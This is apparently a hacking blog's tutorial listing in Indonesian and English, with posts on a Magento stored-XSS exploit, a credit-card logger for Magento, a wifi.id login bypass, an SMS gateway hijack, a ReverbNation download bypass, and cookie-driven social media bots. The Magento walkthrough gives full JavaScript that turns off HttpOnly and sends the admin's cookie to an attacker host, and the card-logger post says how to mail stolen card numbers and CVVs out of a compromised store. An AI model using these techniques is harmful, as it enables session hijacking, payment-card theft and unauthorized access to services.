Tutorial
Showing posts with label Tutorial. Show all posts

BOT Like LINE Home Feeds [Google App Script]

Here is a Google apps script to automatically liked post on your own home feeds / timeline.

https://script.google.com/d/1fbpAdfAat92n5I113g2E0l21tqO_95_w9ScBCtGt6EjqCLMJakDMvuTc/edit?usp=sharing


Steps
  • Click on the link above and sign in with your Google account.
  • Open "File" menu, choose "Make a copy".

  • Replace "nama" values with your name and "kuki" values with your LINE account cookies (read instructions) etc. How to get LINE cookies in the next step.
  • You may need to run a function "cekAkun()" to check whether the account is valid.
  • Then check the log when the function was run.
  • You can set the script to run automatically by setting the "Current project trigger" on the "Resources" menu.
How to get LINE cookies from browser
  • First, you must allow your LINE account to login via PC (in the next step).
  • Go to https://timeline.line.me and sign in with your LINE account.
  • Press F12 on keyboard.
  • Refresh page (F5).
  • Copy the value of cookies in your browser.
  • Network > Choose one request at a domain timeline.line.me > Headers (on the right panel) > Request headers > Copy the cookies value from "Cookie" request header.
Firefox:
BOT Like LINE Home Feeds [Google App Script]

Chrome:
BOT Like LINE Home Feeds [Google App Script]


How to allowing logins to the PC version of LINE
Please configure your login settings on your smartphone using the steps below:
  • Go to More > Settings > Account.
  • Tap Allow Login.

You can also open this menu by tapping this link from your smartphone.

How to set emoticons like
To set emoticons of like (default: null, if you want to set the emoticon randomly).

= 1

= 2

= 3

= 4

= 5

= 6


Change the null value of the variable 'tipe' (on line 9) with numbers above if you want to change the type of emoticons like.


Just write down in the comment section below if you have any curiosity about this, cause curiosity has its own reason for existence you know. (:

@wifi.id Bypass Login (2016) [APPS]

Hell yeah, kembali lagi bersama saya, setelah sekian lama tidak berjumpa. Pasti sudah lama dinanti-nanti? :P

@wifi.id Bypass Login (2016)
(Apps @wifi.id Bypass Login Preview)



Tanpa berbasa-basi, berikut adalah cara menggunakan aplikasinya.
 
  • How 
- Pastikan Anda tersambung pada jaringan SSID @wifi.id
- Lalu Anda juga belum mengotorisasi/login pada @wifi.id
- Buka http://8.8.8.8/ atau apapun pada browser, sehingga URL meranah ke halaman utama @wifi.id
- Salin (Copy) URL halaman utama @wifi.id pada address bar dan letakan (Paste) ke kolom 'Default URL' pada aplikasi
- Kemudian klik tombol 'Hajar!' pada aplikasi
- Cek ping ke google.com untuk mengecek apakah sudah mendapatkan akses internet.

Jika masih belum jelas pada tutorial di atas, Anda dapat melihat video tutorial di bawah ini:



Requirement :
- OS Windows
- .NET Framework 4.0 (or high)

Virus Total: https://www.virustotal.com/id/file/4fa673....
Download : http://www.mediafire.com/download/hryoyj....  108 KB (111,104 bytes)




Oke, mungkin cukup sekian postingan kali ini tentang bypass login @wifi.id, semoga bermanfaat.
Sekian dan terima kasih.



"Sombonglah dengan pakaianmu sendiri."

How to Deal (means Block) with Telkom Ads?



  • What It's?

Saya harap, Anda di sini sudah mengetahui kasusnya. Silahkan baca TELKOM Indonesia Secretly Injects Advertisements.

Singkatnya, cara kerja script tersebut adalah ketika Anda menggunakan browser yang sudah terinjeksi script seperti gambar di atas untuk membuka halaman situs tertentu, maka script tersebut akan memaksa browser untuk memuat halaman dari sumber script di *.u-ad.info dan menampilkan perintah script ke halaman yang sedang Anda buka. Itulah sebabnya, kenapa kecepatan browsing Anda sedikit melambat dan tampil tayangan iklan tertentu di luar konten dari website yang sedang Anda baca. Ini hanya hanya muncul pada setiap situs non-HTTP.



  • How to Deal?

Ada beberapa cara untuk mengatasi gangguan yang disebabkan oleh script ads inject dari *.u-ad.info, diantaranya adalah;

1. Menggunakan VPN (Virtual Private Network)
Advertising inject yang dilakukan oleh Telkom tidak berdampak ketika Anda menggunakan VPN. Sebab VPN merupakan jalur koneksi yang terenkripsi, seperti halnya dengan HTTPS.

2. Menggunakan SSH (Secure-Shell) Tunelling
Kurang lebih metodenya sama seperti menggunakan VPN, yaitu untuk membuat jalur koneksi yang terenkripsi.

3. Melakukan Filtering Terhadap Host
Jika Anda menggunakan Windows, ubah filter hosts pada folder C:\Windows\System32\Drivers\etc, ranahkan *.u-ad.info pada 127.0.0.1. Atau router yang Anda gunakan memiliki fitur blocklist, lakukan pemblokiran sebagai berikut;



4. Pencegahan dari Ads Inject
Jika Anda adalah web developer, lakukan pencegahan dari ads inject dengan cara menggunakan tag body yang berbeda, seperti gambar di atas.

5. Menggunakan Greasemonkey Script
Greasemonkey adalah pengaya browser yang memungkinkan pengguna untuk menginstal script yang membuat perubahan untuk konten halaman web setelah atau sebelum halaman dibuka di browser.
Perubahan yang dibuat ke halaman web yang dieksekusi setiap kali halaman ditampilkan, membuat mereka efektif permanen untuk pengguna menjalankan script.

Pertama, install: https://addons.mozilla.org/firefox/addon/748, for Chrome: https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en

Kemudian install userscript ini: https://openuserjs.org/scripts/dwi.siswanto/Telkom_Ads_Blocker

Jika sudah, silahkan uji coba dengan menjalankan script di bawah ini pada server lokal:


Terdapat perbedaan jika Anda belum menginstall userscript di atas, maka frame URL yang ditampilkan akan tak tersedia (404/not found) atas cfs.u-ad.info, sebaliknya jika Anda telah menginstall maka frame URL akan tak tersedia atas 127.0.0.1.


Deal? Thanks and please share. :)

[TUTS] Let's Exploit Magento! (<= 1.9.2.3)

Why?

A friend of mine sent me an interesting advisory the other day, demonstrating that there was an XSS exploit for the eCommerce platform Magento. I like security advisories, mainly because it's an interesting challenge and a good way to learn more about the underlying frameworks you're using. Since it was a lot of fun to exploit wordpress, I figure'd I'd try out this XSS exploit. It should go without saying, but don't try this on systems that aren't yours, or you'll be violating the law.

The plan

As pointed out in the interesting advisory, this is a flaw that has to be triggered by an administrator checking on an order. So in our pretend scenario we have two types of exploits going on:

  1. Taking advantage of the vulnerability itself
  2. Convincing the admin to check your order

Both of these are likely to be fairly easy given the nature of Magento. Calling or emailing an adminstrator in reference to your order would get any well-intentioned admin to check it out. And the first is trivially done according to the advisery by using the quoted form of an email address for your client account. So our attack plan is simple:

  1. Setup our server to receive information
  2. Perform exploit and call up our friendly admin
  3. Steal their credentials or perform actions under their name

Setup

First off, we need to download a version of magento that isn't patched, so we can grab any copy of magento that is less than 1.9.2.3 from the downloads page. I had to create an account to download the software, so do that if you need to (use guerrillamail if you need a quick email address to use). Then setup magento. In my case I'll be using apache with the following host setup:

# My New Magento Install! Nothing bad could happen :D 
<VirtualHost *:80>
    Servername local.magento.sec
    ErrorLog /tmp/error.log
    DocumentRoot /path/to/magento
    <Directory /path/to/magento >
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

#My Evil domain that will exploit the poor thing:
<VirtualHost *:80>
    Servername local.evil.sec
    CustomLog /tmp/exploit.log combined
    DocumentRoot /tmp
    <Directory /tmp >
        Order allow,deny
        allow from all
    </Directory>
</VirtualHost>

And then setup your hosts file appropriately:

127.0.0.1 local.magento.sec local.evil.sec

And starting up apache and navigating to your local site should give you the installation screen and you can follow the instructions to setup magento. In my case, I had to update some permissions and install the php5-gd package on my system before being able to run magento. Your mileage may vary. Also, installing magento is slow, the database has over 300 tables in the base install, be patient as you install it.

Once you're setup, you should be able to log in to your admin panel and see that magento wants to update:

Ignoring that, create a product or two and verify that your site is working properly.

Confirming the exploit

Before we do anything complicated, we want to perform a smoke test to make sure that we can trigger the problem ourselves. We'll do the same test that the advisory did and simple alert on the page by using the email "><script>alert(1);</script>"@sucuri.net. When you do this from the checkout page you'll get an error saying you it's not a valid email. However, this is only a front end check that we can trivially avoid by editing the HTML and removing the attributes the JS relys on to validate:

Click through the rest of the steps and place your order.

Then in the admin panel navigate to sales and your orders and verify that the exploit happens:

You'll see the pop-up twice before the page fully loads. Now the real question is what can we do?.

Getting dirty

The first thing that comes to my mind is to attempt to steal the session of the admin user. But a quick look at the cookies of the page will tell us that such a thing won't work since the cookies are HTTP-Only:

So that's seems like a dead end at first, but we can actually change the settings for these cookies from magento! The HTTP-Only setting is configured from the Web section of the System configuration page, and by default is turned on:

So the question becomes, how can we get to this page using our exploit? First off, we'll note that the navigation bar has an id of nav. So that's trivial to get via javascript:

var nav = document.getElementById('nav')

And once we do that it's simple to note that the navigation consists of links like the following:

<li class="  last level1">
    <a href="http://local.magento.sec/index.php/admin/system_config/index/key/d1b178d00a7755670c57af7f3f59bfa3/" class=""><span>Configuration</span></a>
</li>

We can't get much from the link itself, but the internal span tells us everything we need to know. Leveraging this:

var spans = nav.getElementsByTagName('span')
for(i in spans) { 
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent == "Configuration") { 
        configLink = spans[i].parentElement.href
    } 
}

And now we have the correct link to follow stored in configLink. Since magento uses prototype we can perform AJAX requests for pages pretty easily:

var configPage = document.createElement('span')
configPage.display = 'None';
new Ajax.Updater(configPage, configLink, {method: 'get'})

This will call up the system page which has another link we need. The HTTP Only settings are in the Web settings, so we'll find that link in the new page and then proceed from there: 

var spans = configPage.getElementsByTagName('span')
for( var i = 0; i < spans.length; i++) {
    if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.indexOf("Web")!=-1) { 
        webConfigLink = spans[i].parentElement.href
    } 
}
var webPage = document.createElement('span')
webPage.display = 'None'
new Ajax.Updater(webPage, webConfigLink, {method: 'get'})

Once we have this page we're nearly there. We just need to select the correct option for HTTP cookies and then submit the form. This is easy enough to do programmatically since the option has an id:

//Get the select menu:
var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0]

//Set the options to No
for(var o = 0; o < select.options.length; o++) {
    select.options[o].value = 0 //set it to the 'No' value easily
}

//Grab that form
var form = webPage.getElementsByTagName('form')[0]
//Submit it via Ajax using prototype so the admin doesn't know
$(form).request({
    onFailure: function(){}, 
    onSuccess: function(t){
        //wait for it...
    }
})

Now that we've done that the HTTP-Only flag on the cookies is gone, which means that we can steal the admin's session.

To send the session to the hacker we'll use our second virtual host and the oldest trick in the book, the access log! Updating the wait for it part of our form handler code gives us the final step to our hijack:

onSuccess: function(t){
    var logPage = document.createElement('span')
    var evil = 'http://local.evil.sec?' + document.cookie
    logPage.display = 'None'
    new Ajax.Updater(logPage, evil, {method: 'get'})    
}

Once you do this, you'll see the admin cookie appear in the log file of the hackers domain:

Once we've got this, we just do a simple cookie setting and we're good to run wild. First go to the admin page and open up your console. Then set the document to be the value sent in your request:

Refresh the page and you'll have access to the admin console:

Putting it all together

It's easy to write all the above into the console to verify that it works, but it's another thing to actually use the email exploit to run the code. We have two options:

  1. Insert all that code into the email address
  2. Have the email address inject a script to handle things for us

Either way we need to wrap the code into a single package so let's do that:

/** Helpers */
function findLinkInSpan(spans, search) {
    for(i in spans) { 
        if (spans[i].hasOwnProperty('textContent') && spans[i].textContent.trim() == search.trim()) {
            return spans[i].parentElement.href;
        } 
    }
}

/** Wait for the AJAX to stick the data into our target element */
var waitingTime = 3000;

function exploitOrderPage() {
    /** Navigate the menu */
    var nav = document.getElementById('nav');
    var spans = nav.getElementsByTagName('span');
    configLink = findLinkInSpan(spans, "Configuration");

    /** Global for exploitConfigPage to use */
    configPage = document.createElement('span');
    configPage.display = 'None';
    new Ajax.Updater(configPage, configLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitConfigPage()
                }, waitingTime); 
            }
        }
    );
}

function exploitConfigPage() {
    var spans = configPage.getElementsByTagName('span');
    var webConfigLink = findLinkInSpan(spans, 'Web');

    /** Global for exploitWebPage to use */
    webPage = document.createElement('span');
    webPage.display = 'None';
    new Ajax.Updater(webPage, webConfigLink, {
            method: 'get', 
            onSuccess: function(){
                setTimeout(function(){
                    exploitWebPage();
                },waitingTime);
            }
        }
    );
}

function exploitWebPage() {
    var select = webPage.getElementsBySelector('[id=web_cookie_cookie_httponly]')[0];
    for(var o = 0; o < select.options.length; o++) {
        select.options[o].value = 0; //set it to the 'No' value easily
    }
    var form = webPage.getElementsByTagName('form')[0]
    //Submit it via Ajax using prototype so the admin doesn't know
    $(form).request({
        onFailure: function(){}, 
        onSuccess: function(t){
            var logPage = document.createElement('span');
            var evil = 'http://local.evil.sec?' + document.cookie;
            logPage.display = 'None';
            new Ajax.Updater(logPage, evil, {method: 'get'});
        }
    })
}

/** On load we want to hide the weird email from the admin and steal! */
var anchors = document.getElementsByTagName('a')
for(var i = 0; i < anchors.length; i++) {
    if(anchors[i] && anchors[i].href == 'mailto:') {
        anchors[i].textContent = 'user@example.com';
    }
}
//GO!
exploitOrderPage();

The code is a little rough because we have a series of callbacks that fire as the pages are loaded into the target divs by prototype. In my testing it seemed like there was enough delay between when the request completed and when variables like configPage were filled with data that a timeout was the only way to ensure that there was data available to iterate over with .getElementsByTagName.

Note that even though we don't have any CORS headers on our evil domain, we don't actually need them to get the credentials in our log file since the preflight request will show up in the log. If you were a real attacker trying to be silent, you'd likely adjust your server accordingly.

So let's try the first tactic, putting all of the code into an email address in the checkout form:

And editing the HTML with the inspector to remove the validation from the element results in

And checking out the magento source it looks like the length calculation is pretty small:

//lib/Zend/Validate/EmailAddress.php
 if ((strlen($this->_localPart) > 64) || (strlen($this->_hostname) > 255)) {
    $length = false;
    $this->_error(self::LENGTH_EXCEEDED);
}

So it seems like the first attempt is out since the full script can't be fit into 64 characters. So instead let's try to load it from our evil domain! We can do this by saving our script to a.js and loading it via a script tag with the malicious email:

"<script src='//local.evil.sec/a.js'></script>"@exploited.net

This comes in at 47 characters, so if you're testing with a longer local domain name then a link shortener would be a good idea. Or if you don't mind whiting out most of the screen you can drop seven characters by removing the closing <script> tag (though that makes the attack more obvious).

Submit your order after filling out the rest of the fields:

Navigating from our admin window to the new order, we'll be greeted with our usual screen, but if we open up the console in a few seconds we'll start to see the effects of the attack:

And in our log files:

Using this value we can then update our cookie from our hackers perspective:

Then simply click in the url and navigate to /admin and you've successfully broken into a magento site using an exploit and session hijacking!

So what now?

Now you go and you update magento so that you don't run into someone pulling this trick on you! The last thing you need is a random user getting access to customer information, saved credit cards, or anything like that! Just browsing through the configuration screen's it's easy to see multiple attack vectors that one could use to install back-doors to the system so that even after they upgrade, the attack can still get in.

Security is important, and I've written this post so that if anyone is using an old version of magento in production they can go to their boss, demonstrate the attack here, and get their blessing to spend as much time as neccesary in patching their system. It's not always fun to upgrade when we could be developing, but doing so keeps the entire internet healthy (you don't want your servers or clients helping out with a DDoS do you?). So get out there and patch!

Obvious Disclaimer

In case it's not obvious This is example code meant for educational purposes only. Do not run this on any machine you do not own! It is a violation of both state and federal law that often carries a hefty fine. Just don't do it.


Source: http://www.plasticsurgery.whoseopinion.com

[SCRIPT] OpenVPN Config Grabber from VPN Gate

OpenVPN Config Grabber from VPN Gate 


First, you must install OpenVPN Client. Download here!

Than, look bellow.
script;



Usage; Open this PHP script with a browser.
Config will be saved into your document root of htdocs directory (if you're using XAMPP, means Apache server).


Proof;
OpenVPN Config Grabber from VPN Gate

CMS Detector, More Than 50+ CMS to Detect

CMS detector
(CMS Detector preview in Windows)

Sometimes, for whatever reasons, you will want to know if a website is using a content management system (cms), and if so, which one. 
This is a rather complicated procedure, but we did our best to collect in our service the maximum number of features that can help define a website's cms.

What's CMS?
From the Wikipedia, a content management system (CMS) is a computer application that supports the creation and modification of digital content using a common user interface and thus usually supporting multiple users working in a collaborative environment. CMSes have been available since the late 1990s.

CMS features vary widely. Most CMSes include Web-based publishing, format management, edit history and version control, indexing, search, and retrieval. By their nature, content management systems support the separation of content and presentation.

How to identify which CMS is used on a website?
This tool will analyze websites and attempt to detect the plaform, language, framework and other technologies used for any website.
usage; this.php <host>



This is an experimental service, please contact us if any problem occurs or if you think a site has been wrongly detected.

[TUTS] How to Add CreditCard Logger in Magento?

Proof of Concept


First, you must exploit Magento site.
Here's auto exploiter script written by my homies FathurFreakz[coder]



File: app/code/core/Mage/Paygate/Authorizenet.php

$payment->getOrder()->getBillingAddress(); // Billing Address
$payment->getCcType(); // CC Type
$payment->getCcOwner(); // Cardholder Name
$payment->getCcNumber(); // CC Number
sprintf('%02d-%04d', $payment->getCcExpMonth(), $payment->getCcExpYear()); // CC Expire
$payment->getCcCid(); // CC CVV


Just add mail() function inside _place() function between self::RESPONSE_CODE_APPROVED:.
Regards :)

[SCRIPT] Bot RSS Feeds Transferer to Facebook

Bot RSS Feeds Transferer to Facebook? Hah? Apaan ya?
Mungkin ada yang belum kenal dan ada juga yang sudah tidak asing lagi.
Pernahkah Anda melihat sebuah website yang terdapat logo atau kata-kata RSS? Jawabannya adalah "ya!". Kebanyakan ketika kita membuka sebuah website atau mengunjungi blog, terdapat fasilitas RSS. Sebenarnya apa sih RSS itu? Dan apa kegunaannya?

 RSS adalah sebuah file berformat XML yang digunakan untuk sebuah situs web atau blog (Sumber : http://id.wikipedia.org/wiki/RSS). Singkatan dari RSS ini mengacu kepada beberapa protokol, diantaranya :
  • 1. Really Simple Syndication (RSS 2.0)
  • 2. RDF Site Summary (RSS 0.9 dan 1.0)
  • 3. Rich Text Summary (RSS 0.91)
Pengertian sederhana dan kegunaannya adalah teknologi yang memudahkan kita untuk mendapat informasi terbaru dari web atau blog tersebut, tanpa kita harus membuka web tersebut.

 Kemudian, apa itu feed? Feed adalah pengumpul untuk mengecek situs yang menyediakan RSS dan menampilkan berbagai artikel baru yang ditemukan. Feed ini bisa berupa program komputer atau layanan yang berbasis online.

 Untuk dapat menggunakan RSS ini tidak sulit. Ya, iyalah! Jaman sekarang apa sih yang sulit? Wong tinggal klik-enter-klik-enter doang, bikin tangan robot aja (katanya) mudah kok.

 Tapi di sini bukan bagaimana cara menggunakan RSS dan bagaimana membuat tangan robot tersebut, melainkan bagaimana cara meng-update informasi terbaru dari web atau blog yang dituju ke Facebook yang telah saya aplikasikan dalam bahasa PHP.
Ini sama halnya seperti aplikasi pada umumnya yang bertebaran di Facebook jika kita mencari RSS pada kategori aplikasi.
Bot RSS Feeds Transferer to Facebook Review

Yang perlu Anda siapkan di sini adalah;
  • 1. Kuki Facebook (How to get?)
  • 2. User ID atau Grup ID target yang ingin ditransfer
  • 3. Daftar RSS feeds

Orkes, langsung saja. Ini dia skripnya.
rss-bot.php



Note
2. define("COOKIES", "...");
Inputkan semua kuki Facebook (pisahkan setiap parameter dengan titik koma ';'). Ini untuk mendapatkan otorisasi ke rest API Facebook dengan akses token baru yang diminta tiap kali dijalankan.
3. define("TARGET", "");

 Ini tidak berlaku jika Anda ingin mentransfernya pada kronologi Anda sendiri (dapat dikosongkan), nilai default adalah: me.
4. define("LOG", "rss-log.txt");
Disarankan untuk membuat file kosong dengan nama yang sama pada kode yang tertulis, guna untuk menghindari duplikat status yang sudah diposting.
12. $rss = array(
         ...
    );
Jika demikian Anda ingin mengatur atau mengubah daftar RSS feeds, silahkan saja. Dengan syarat url RSS feeds tersebut sah (ext:XML).

 Rekomendasi trigger yang disarankan adalah 1x5 jam.
Mungkin cukup tau sampai di sini saja ya? Jika ada yang menghadapi kegagalan bermasturbasi, luapkan dikomentar.
Terima kasih. ^^

[SCRIPT] Bot Twitter Reply by SimSimi

Bot Twitter Reply by SimSimi reviewBot Twitter Reply by SimSimi review
A few months ago, there is a wants to be made by me about the bot replies tweet (by simsimi). Sorry could only reply to the request at this time. Hihihi.



What it SimSimi? Previously I've explained the definition of simsimi on the post Bot Telegram SimSimi. So, at this point I don't need to be long-winded.

 First, download TwitterOAuth PHP Library by Abraham.

Than you need consumer key, consumer secret, token key and token secret. You can find them at Twitter Application Management.


bot.php


 Note
17. define('LANG', 'en');
On line 17 is the language used to reply tweet by simsimi. (Can't be blank)
Available az (Azerbaijani), de (Dutch), en (English), fr (French), it (Italian), pt (Portuguese), ru (Russian), es (Spanish), tl (Tagalog) and tr (Turkish).
18. define('LOG', 'log.txt');
On line 18 defines as a log for the tweets that have been returned, in order to avoid duplicates.
23. $tuit = ambil("statuses/mentions_timeline", array("count" => "1"));
And the variable $tuit on line 23 that calls the function ambil(). Count is the number of tweets to be taken (mention). Recommend; 5.

I think it's enough, if you have questions or problems in the code, please comment. :)

[TUTS] SMS Gratis ke Indonesia Gateway Hijack

My gateway server of victim is; smsgratis2indonesia{dot}co{dot}id
Let see how it's works!

SMS Gratis ke Indonesia Gateway Hijack Preview
(SMS Gratis ke Indonesia Gateway Hijack 1.0)


# usage; http://localhost/this.php?no={victim/target number}&text={your text}



[SCRIPT] How to pinging a host by PHP?

Pinging a host by PHP
# usage; this.php domain/ip


[APPS] BBM 2.10.0.31 Mod Transparent

BBM 2.10.0.31 Mod Transparan Preview

 Bila droider bosan dengan tampilan aplikasi BlackBerry messenger official, maka BlackBerry messenger (v. 2.10.0.31) Mod ini bisa jadi alternatif untuk di install di handheld android.

  • Fitur :
- Tema Transparan
- On/Off Block Read
- Grayscale Display Picture
- Full Display Picture
- Shape Display Picture
- Flash Lamp
- Lock Mode
- Post Image to Facebook
- Move to SDcard
- Auto Rotation
- Enable Auto Text
- Reload Button
- Enable Custom Font
- Enable , Emoticon

  • Screenshot :
BBM 2.10.0.31 Mod Transparan Preview






  • Download  :
http://static.4shared.com/images/indexPage/upload.png?3989885575
(click here for download)




  • How to :

 - Uninstall BlackBerry messenger yang orisinil.
Note : Tidak perlu takut PIN berubah atau kontak hilang, karena jika Anda login dengan email yang sama, maka tidak ada perubahan sedikitpun dari yang sebelumnya.
- Buka Pengaturan > Pengaman > centang Sumber tdk diketahui.
- Buka APK BlackBerry Mod yang baru saja Anda unduh.
- Install.

Muwehehehehe, mungkin cukup sekian saja ya, posting selanjutnya Insha'Allah pembahasanan mengenai bagaimana cara modifikasi aplikasi Android. Hamdoelelah. :)

[EXPLOIT] How to Bypass ReverbNation Disable Download (w/o Software)

RevebNation logo


Apa itu ReverbNation? 

Ya, ReverbNation adalah situs web yang berfokus pada industri musik independen dan bertujuan untuk menyediakan sebuah situs pusat untuk musisi, produser, dan tempat-tempat untuk berkolaborasi dan berkomunikasi. Initinya adalah media penyimpanan lagu, sama halnya iTunes.

Dan di sini saya hanya ingin memberikan tutorial cara mem-bypass lagu yang hak izin untuk megunduhnya tidak diberikan (disable download).
Ya setelah saya cari "how to bypass/cara men-download lagu dari reverb yang disable" di google, mayoritas penulis menyarankan menggunakan software (seperti IDM, dll) untuk mendapatkannya.

 Tepatnya kemaren saya telah melakukan riset (baca: iseng) untuk melakukan hal serupa seperti ini. Dan kira-kira beginilah hasil dari riset percobaan tersebut.

 Saya ambil contoh lagu Anak Kemaren Sore saya (yang belum jadi :P) dan tidak ada hak izin untuk mengunduhnya. Maka yang kita lakukan hanya memanipulasi permintaan terhadap server (baca: exploit).


Cara kerja

  • 1. Putar lagu tersebut (untuk mendapatkan kuki dan atribut lainnya)
[EXPLOIT] How to Bypass ReverbNation Disable Download (w/o Software)
Simpanlah kuki yang digaris bawahi pada screenshot di atas (hanya hash-nya saja).
  • 2. Eksploitasi
Lalu kita melakukan eksploitasi agar bisa mengunduhnya.

$ wget https://www.reverbnation.com/audio_player/html_player_stream/{_reverb_currentsong cookies}?sid={songs id} -O file-name.mp3


Cara sederhana untuk mendapatkan songs id;
[EXPLOIT] How to Bypass ReverbNation Disable Download (w/o Software)




  • 3. Proof of Concept
[EXPLOIT] How to Bypass ReverbNation Disable Download (w/o Software)

Yah, sepertinya cukup sekian saja ulasan dari saya mengenai cara bypass download ReverbNation.

Akhir kalimat saya ucapkan, kejarlah ilmu sampai ke Kuvukiland (Afrika).
Semoga bermanfaat.
Subscribe to: Posts (Atom)